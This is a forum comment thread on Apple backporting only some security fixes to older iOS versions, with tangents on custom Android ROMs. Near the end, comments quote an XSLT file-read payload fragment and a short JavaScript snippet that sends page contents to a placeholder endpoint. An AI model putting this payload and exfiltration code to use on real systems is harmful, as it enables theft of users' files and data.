In fact, one could argue it's also "very unethical" for Apple to (negligently) allow someone to use a potentially unsafe or hackable product. To be maximally ethical, Apple should be remotely bricking any Apple device the day it loses security support. Better to be on the safe ("ethical") side and remote wipe too, to protect people's data privacy.

Can you see how Argument From I Merely Assert XYZ Is Unethical Then Demand Some Arbitrary Relief can quickly break down?


iOS 12 was released September 2018 and

> iOS 12.5.7

> Released January 23, 2023

https://support.apple.com/en-us/103015


So theoretically - and I tried this a couple of years ago - I could still download the “last compatible version” of an app if it’s available on the store for my old 2010 iPad 1st generation running iOS 5.

This device had 256 MB RAM and a 400 MHz 32-bit processor. Should Apple still support this with security updates?


It’s an issue of expectations. If Apple advertises security support then it’s fraudulent to not deliver it; on the other hand, if they advertise an EOL date, then I’d agree there’s no reasonable expectation of security updates. But what they actually do is neither, they communicate very little, supporting some past iOS versions fully and others to degrees that only they know, resulting in them profiting off a reputation for backporting security updates while not actually binding themselves to deliver it, or, often, doing so.

Like the battery issue, I feel the whole issue is communication. Apple needs to communicate when they EOL OS versions. You don’t otherwise know it, partly because EOL OS’s, including this phone’s, still get security updates, just not all of them.


They do communicate it in every major release, including which devices are supported. Many major vendors release security updates for EOL devices when doing so would greatly increase the security posture of those devices and comes at little to no cost to the vendor. Notably Cisco, Microsoft, Apple, and Samsung come to mind.

Is the implication that once a device is EOL that a vendor should never release an update for that device again?


They only communicate it after the fact, when the new OS is impending release. There’s no way to know at time of purchase how many years your device will be supported.

I feel like Apple changed the dynamics of smartphone market from company-issued devices like BlackBerry to BYO with the iPhone essentially on purpose so they don’t get stuck providing decades of enterprise support promises like companies like Microsoft.

Companies purchasing bulk orders of hardware probably wouldn’t tolerate a vendor unwilling to make any sort of concrete support promise for the contract. But a company who employs iPhone users can basically put the responsibility on the user and simply block access to non-compliant devices.


> Is the implication that once a device is EOL that a vendor should never release an update for that device again?

It seems typical for vendors to use "EOL" to refer to end of support life, not merely discontinuing sales of the product. Most notably, that's how Microsoft generally frames EOL for major Windows releases, hence the expectation of jumps in PC sales corresponding to EOL of XP, 7, and 10.


They communicate OS version device compatibility, I’m talking about communicating OS version EOL. For example, Windows 10 EOL is 2025-10-14, and we know this years in advance. For Apple, not only do we not get advance notice, we don’t even know when it’s already happened.

No, I’m not implying there’s something wrong with shipping the occasional update to EOL devices.


Does apple release jailbreak tools for ten year old phones?


Correct. The issue is it is not commonly known that Apple isn't actually backporting fixes for exploits while it has been claiming to update the phones: this is earth-shaking[^1] news

[^1] It would be completely reasonable to say "Earth-shaking? Really? You expect security backports for a decade?" I've been in mobile my whole career, iOS for 7 years, starting from jailbreaking the original iPhone, then worked on Android itself for 7 years. I am sure significant decisions were made assuming this was the case.


Touche. P.S. Keep in mind though, what is the state of security of the Android phone you bought new in November 2015?


The Nexus 6 (2014) can still run a version of android with security patches: https://wiki.lineageos.org/devices/shamu/

Google no longer offers security patches directly, but since you control the phone sufficiently to install your own OS, the community can come together and keep security updates flowing. You could do it yourself if you wanted.

Apple devices make this sort of community maintainership effectively impossible.

I know this means practically nothing since only nerds can actually install a third-party ROM, so for the general populace only the "default" security patch window matters, but for the hacker news crowd it seems like it might be a meaningful difference.


But it is effectively impossible on Android as well. Let's ignore for a minute the fact that practically no one can install a custom ROM.

The bigger problem is that a huge bunch of software running on the phone is fully proprietary and closed source, and there are many many different versions for different phones around - making it virtually impossible to do any meaningful reverse engineering. So sure, your main OS may be up to date, but the baseband OS and virtually all of the device drivers will be left vulnerable, and they have just as much if not more access to the data on your device.


Is my grandma going to install a custom rom? If it’s not over the air it might as well not exist.


Maybe you could be a good grandson and do it for her?


I don’t consider it a good thing to install a custom OS for someone and not give them the same level of support.


Does that include updated drivers? If no, then there are still many unfixed security vulnerabilities.


It's all well and good to say "oh you can just install a custom ROM". But you (and many here) can do that. Because you're technically inclined. But the vast majority of users have no idea what the hell you're talking about. They barely know what a security update is or what version of Android they're using, let alone being able to find, choose, and install a ROM.

Can we just choose to stop suggesting it as a legitimate solution cause outside of this bubble, it absolutely is not.


People don't know how to install Windows either. In theory they could go to a shop to update their phone like they are doing with Windows, but the reality is that nobody cares about updating their phone.


Is the only standard to which we hold one company whatever the other does? Is there no room for higher principles here, in your view? The competition between consumer brands is all that matters?

Come on.


Huh, it can be totally earth shaking or completely normal depending on time and place. In current market place of smartphones it is more towards earth shaking than normal.

You don't have to agree but the resale value of older iPhones being much, much higher than Android tells you customers value the support and quality of the iPhone.


As much as the sales of healing crystals tells me how much people value the health and anti-aging benefits of those.


Healing crystals seems to be a much smaller market (to the point of barely existing) than “Big Pharma”, so your analogy doesn’t really make sense.


The irony of Steve Jobs himself dying because he wasted time trying non-big-pharma "remedies" before following actual oncologists advice is too much.


My 10 year old laptop is still getting OS updates


> My 10 year old laptop is still getting OS updates

Microsoft is trying to fix this. Win 11 wants a TPM. /s


Some iOS 15 phones like the 5S/SE have no newer comparable phones which makes upgrading difficult. Oh dear, I suppose not browsing the web is another option.


What’s missing from the more recent SE models?


A 4-inch screen size that allows the phone to be used single-handed with ease anywhere on the screen, which I’m using to write this comment right now. It’s uncompromising in battery longevity when considering its size, too. First-gen SE is the best phone Apple ever made. The newer SE are terrible.


As someone that went from 5S to 2016 SE to 2020 SE which is my current phone, I've been very satisfied with the 2020 SE.

With each phone I have always taken steps to reduce battery usage, disabled background refresh, and manually turn on low power mode after charging every single time.


Not sure if you're doing it manually from the settings, but you can create a Shortcut that enables low power mode. I have a little icon that I press, but there might be an even better way (automatically trigger on unplug? IDK)


Is your hand large enough to handle the phone one-handed and touch anywhere on the screen with ease without risking a drop? If not, do you use some kind of magnet finger-ring case or similar case?


I have my iPhones set to bring the top of the screen to the middle when I double tap on the Apple logo on the back.

It’s a feature called Reachability.

https://support.apple.com/guide/iphone/use-reachability-iph1...


I cannot reach the upper left corner one-handed. Have not tried finger-rings or popsockets yet.


Small physical size, also a headphone jack.

The more recent SE models are iPhone 8 bodies with upgraded internals (being an iPhone 11 and 13 inside, respectively) and Apple no longer offers a Mini version of their newer phones (not that the A16 and A17 are significant improvements on the A15, but still).

And the Mini is still larger than the first SE by about a half inch in either direction; the 8 (and the newer phones) add another half inch on top of that.

Of course, the problem with using a first-gen SE today is that because information density on mobile is abysmal, the added vertical space has been very welcome to app developers (who also might not test on the smallest screens). So while the smaller phones were ergonomically far superior to the larger ones, and this is to a point true for the Minis as well, that's since been "balanced" by inherently worse UI/UX on said phones.


Eh, iPhone SE 2nd generation/3rd generation?


It's worrying to me since it's often kids who get the hand-me-down phones. I don't think they are going to know how vulnerable their data is. Surely Apple could at least let a community compile latest security updates, if they don't wanna invest their many riches in it? People often can't afford newer phones, and their data is vulnerable.


How do we know they won’t patch it in like an iOS 15.8.1 update?

Even iOS 12 had a security update in 2023 still.


Apple doesn't patch every security hole in older iOS versions. I don't know what the criteria is, but my guess is if it's a major security hole, or an easily backported one, they'll do it, but if it's super minor or not backportable, they won't.


If I had to guess, I think it’s when they see a report that it’s been actively exploited.


Would be great to get Linux running on and driver coverage for all of the system-on-chip of these devices. Talent exists for this but they are busy with their jobs or more interesting problems.


https://projectsandcastle.org/

But don’t get too excited.


Moving the photos and videos to a hard drive is a pain, USB is buggy, iCloud is useless. Cheaper iPhones have very little storage and there is no SSD slot either. It means, when the phone is full you have to buy a new one. If you want to update (assuming updates are available) you have to do hours of manual photo and video deletion to make space for the update.

If they really wanted to update phones that are full they could move the images/video to their server until the update is done.


I think a lot of people here are missing an important point: Apple has always been fairly ambiguous about what their level of support is for older devices beyond major feature updates.

If it weren't for a friend giving me his old iPhone XS as thanks for a favor, I'd probably still be using my old iPhone 6s--and I would not have worried about it from a security perspective purely because (as the article notes) Apple is still releasing security fixes for iOS 15. I'd feel differently if Apple had publicly stated that all iOS 15 security fixes from now on will be on a minimum effort basis only.


Those Apple commercials purporting that their ecosystem was the safest/most secure have aged like old milk


Which 10 year old phone is more safe / secure?


> Which 10 year old phone is more safe / secure?

Windows Phone ? I bet nobody writes exploits for it anymore. /s


Not really, no.


I don't know what OP expects from such an old device. Apple goes above and beyond other manufacturers in terms of support.

The phone is almost 10 years old, the only thing Apple should do is send out a push notification warning users their device is no longer supported.


My laptop is older than that and I have no problem getting updates. Turns out tightly coupling hardware and software for general computing devices is not such a great idea for users or the environment.


Microsoft straight up disallows Windows 11 installation on plenty of PCs that could easily run it.

Sure you can argue that it's "easy" to install Linux on it, but that's out of scope for the typical user.


Apple straight-up disallows MacOS updates on plenty of Macs that could easily update, too. I'd even argue they're worse than Microsoft about it; I heard about Opencore Legacy Patcher looooong before I knew people were modifying Windows 11 images to get a working install.

> you can argue that it's "easy" to install Linux on it

In my experience, the average Linux install wizard is less technically involved than the MacOS one. So yeah, maybe I would argue that.


Most people don't even know how to install an OS.

I wouldn't expect the typical person to be able to do it.


Moot point. Both Microsoft and Apple expected the user to install their own OS in the past, and the world didn't explode because of it. If stuff like UEFI and bootloader unlocking was standard again, OS installation would be easy as plugging in a dongle and rebooting.

Plus, you still haven't touched the central point; tightly coupled software and hardware creates more e-waste. What people do today doesn't matter if they're never presented a serious alternative; if ignorance was a basis for removing functionality there would be nothing left of the modern smartphone.


Apple fans would say tightly coupled hardware and software is why Apple products are better than competitors. I don't fully agree but I can see the point.


They may be right. If that same system has proven harms though (or even simple conflicts-of-interest), Apple might have to find a new business model. The whole "we own your app store, we own your payment processor" shtick has really raised eyebrows in the international markets.


Quoting the post:

> iOS 15.8 is still powering those devices, seemingly with official Apple support, with the latest update from October the 25th, which addressed some security vulnerabilities.

> In reality, however, Apple seems to only be addressing some security issues in its older supported devices.

The author is surprised, reasonably IMO, that if a device is getting security updates, you are still exposed to known vulnerabilities.

For a tech competent user this is worse than clearly being out of support in which case you would retire the device.


Well that's just weird, you either support devices or not.


Microsoft still releases security updates sometimes for the 22-year-old Windows XP.


>Apple declined to comment for this article.


This is true for pretty much every vendor. Security fixes do not all get backported to every previous version of something. Newer iPhones do not just run the latest version of iOS, they are more secure from a hardware perspective too.


"every previous version"

No reasonable person is asking for this.


Okay replace that with "more than the latest version / LTS".


How is hardware relevant here?


fwiw I tested this and the exploit doesn't work on iOS 16 which is the latest available for a 2017 iPhone X.


The iPhone 8 was sold new less than 3 years ago. Okay, new features shouldn't be expected, but patching known vulnerabilities should be required.


What does the iPhone 8 have to do with this discussion?

The linked piece specifically refers to iPhone 6S and iOS 15.8.


It runs iOS 16, where Apple has the same policy of only providing partial fixes. From the article:

> A new exploit targeting the iOS (among other OS’) Bluetooth stack has also been left unpatched by Apple in all versions except iOS 17.


iPhone 8 had a patch to iOS 16 released a week ago, 6 years after it was released and 3 years after it was last sold during a global pandemic?


And the entire point of the article is that those security patches are ignoring known vulnerabilities that are patched by Apple in iOS 17.


The iPhone 6S mentioned was released in 2015, but should run iOS 15, which Apple still should be releasing security updates for?


Apple only publishes all iOS and macOS updates to the latest version of their operating systems. They release important updates to older operating systems (which is better than much of their competition!) but not all vulnerabilities are fixed for old versions.

You'll probably always be safe from remote code execution on supported versions of iOS/macOS, but exploits like these aren't always fixed. Unfortunately, you can't install an alternative browser engine on iOS/iPadOS, so I guess you should expect all websites to be able to read all of your cookies just in case.


As he clearly describes in the article, Apple seems to patch some exploits but not others in older versions of iOS.


I understand that, I’m just saying that they claim it gets security updates, so it seems like the kind of thing they should include.


When opening the page, your /etc/passwd is there for the world to see.

...more precisely, for you to see; this needs to be combined with something to send back data (JS?) to be truly exploited.


And how's that more difficult than the loading page (exploit.svg) doing a GET/POST request to some server, after <xmp><xsl:copy-of select="document('exploit.php')"/></xmp> was loaded?


Isn't the JS exfiltration part trivial?

The attack assumes that the victim is visiting an attacker-controlled web server.

If the attacker can put secret data in the DOM within the victim's browser, the attacker can also add JS on the same page that POSTs the DOM contents to the server once they're populated with secrets.


If it's "trivial", then perhaps the article should've demonstrated that.


Vulnerability research without doing the work to productize exploits is good and productive, let's not normalize the opposite expectation. It's a chilling effect.


If I prove I got a shell prompt on a remote device without any authentication, do I then need to show that I can execute arbitrary code? Or is it clearly implied?

If the page body can read a file, then it can just execute an XmlHttpRequest to send that data to the origin server, which is the attacker in this scenario. This is just how the web works, nothing more to say about it, and no need to prove it.


It's not necessarily true that what can be read locally can be sent to a remote server.


It very much is on the web, if you are sending it to the origin server.
Yes, obviously the website can retrieve this data too.

  <script>
  // read the text of the second <p> on the page and send it to the server as a query parameter
  var olis = document.getElementsByTagName('p');
  var data = olis[1].textContent;
  var xmlHttp2 = new XMLHttpRequest();
  xmlHttp2.open('GET', 'https://endpoint/?data=' + encodeURIComponent(data));
  xmlHttp2.send();
  </script>


Only took 7 hours to get something that looks like it might work but clearly has tons of syntax errors and won't work as-is.

What are y'all trying to hide?


Typed from my phone. I don't reply to hn comments based on your schedule.


You are too smart to die on this absurd hill, knock it off.


Yea, this reads like someone was denied a bounty for a "exploit" and decided to make it a whole thing as retribution.


I don't see how. Apple is choosing to not patch known vulnerabilities on hardware sold new less than 3 years ago. Hardware they're happy to charge for repairs on.


Yes, science as a public service as retribution


That is why I am an android dude, you will always find a random ROM on xda with the latest android security patch and sometimes even the latest android version on devices 10+ years old even if the manufacturer has stopped supporting it a while ago.


Not going to lie, if I were trying to infect some devices, it might be through “porting” unofficial “patches” (that no one will ever realistically inspect) for 10+ year old, out-of-support devices whose users have allowed root access.


XDA works a lot on reputation and realistically you will infect like 1k phones none of which will be high value targets. I don't see the motivation. Those maintainers do quite a lot of work to backport patches every week/month and offer OTA. Also I don't enable root when flashing, that is not required at all.


Wait... so because you don't want to be infected because you're using an out of date OS, you load OS patches of questionable provenance, but you're not worried about that since nobody would bother to infect you anyway? Why not skip a few steps there and just run an out of date OS?


Every device running an old OS is vulnerable, so it's better to throw the dice on an aftermarket ROM.

Edit: Though to keep things fair, it must be said that that particular argument only really applies to old devices. If you have a new device (or rather, one still getting regular security updates from the vendor) and a trustworthy vendor, a person could reasonably argue for staying on the stock ROM.


Fair point


Think about it the other way: if someone who happens to use a random ROM happens to be a target of a state security agency, of course it would be trivial to infect, and the other 999 users would be collateral damage.


If a state security agency is your threat model you'll be hard pressed to stay secure even with an airgap. If it's wholesale worm-like attacks you'll be way ahead of the curve by using a niche ROM from a god-forsaken site compared to any slightly out-of-date OEM distro.


Realistically, if someone makes a fringe rom that may be downloaded a few thousand times, how many people are going to bother checking for nefarious exploits hidden in there?

I hate that I wrote that lol. It reeks of the kind of cybersecurity whataboutism that leads to people inconveniencing the SHIT out of themselves for the sake of security.


I think human laziness can be counted on. Realistically I don't see any benefit in doing something nefarious and there is karma like on HN.


> you will always find a random ROM on xda

Installing random ROMs from random developers is an interesting take on security.


That was bad phrasing, there is karma on XDA and trusted name reputation (evolution x, pixel experience, lineage os). So it is not a random ROM from a random dev. And you always have the source for those builds.


What about the binary blob drivers that can't be patched and are one of the leading attack vectors? Just look at all of the Qualcomm monthly patches alone. Unless all of your binaries, that have no source, are up to date you'll never be secure on any XDA ROM.


That is a real problem agreed, though vendors are starting to OSS more of those lately. Still better than running an unpatched android of 4 years.


lol! Are you really comparing Apple released operating system updates to xda?


The whole point of the article is that they don't actually do that


How does a random image help most users?


I guess bricking your device makes security irrelevant